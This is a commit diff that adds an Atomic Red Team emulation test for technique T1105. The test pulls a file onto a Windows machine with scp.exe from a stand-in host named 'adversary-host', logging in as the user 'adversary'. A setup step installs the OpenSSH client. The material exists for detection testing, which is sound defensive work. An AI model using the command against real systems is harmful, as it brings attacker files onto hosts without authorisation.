T1105 - Windows pull file using scp.exe (#2985)

* T1105 - Windows pull file using scp.exe * Update T1105.yaml --------- Co-authored-by: Hare Sudhan <[email protected]> Co-authored-by: Carrie Roberts <[email protected]>
redcanaryco · Nov 19, 2024 · 35b0abe · 35b0abe
1 parent 012a309
commit 35b0abe
Showing 1 changed file with 51 additions and 0 deletions.
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
@@ -1048,3 +1048,54 @@ atomic_tests:
       $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}"
       Remove-Item -Path $filePath -Force -erroraction silentlycontinue
       Write-Output "File deleted: $filePath"
+- name: Windows pull file using scp.exe
+  description: |
+    This test simulates pulling files using SCP on a Windows environment.
+  supported_platforms:
+    - windows
+  input_arguments:
+    remote_path:
+      description: Path of folder to pull
+      type: path
+      default: /tmp/T1105.txt
+    remote_host:
+      description: Remote host to pull from 
+      type: string
+      default: adversary-host
+    local_path:
+      description: Local path to receive files
+      type: path
+      default: C:\temp
+    username:
+      description: User account to authenticate on remote host
+      type: string
+      default: adversary
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+        This test requires the `scp` command to be available on the system.
+      prereq_command: |
+        if (Get-Command scp -ErrorAction SilentlyContinue) {
+            Write-Output "SCP command is available."
+            exit 0
+        } else {
+            Write-Output "SCP command is not available."
+            exit 1
+        }
+
+      get_prereq_command: |
+        # Define the capability name for OpenSSH Client
+        $capabilityName = "OpenSSH.Client~~~~0.0.1.0"
+        try {
+            # Install the OpenSSH Client capability
+            Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop
+            Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green
+        } catch {
+            # Handle any errors that occur during the installation process
+            Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red
+        }
+  executor:
+    elevation_required: true
+    name: powershell
+    command: |
+      scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}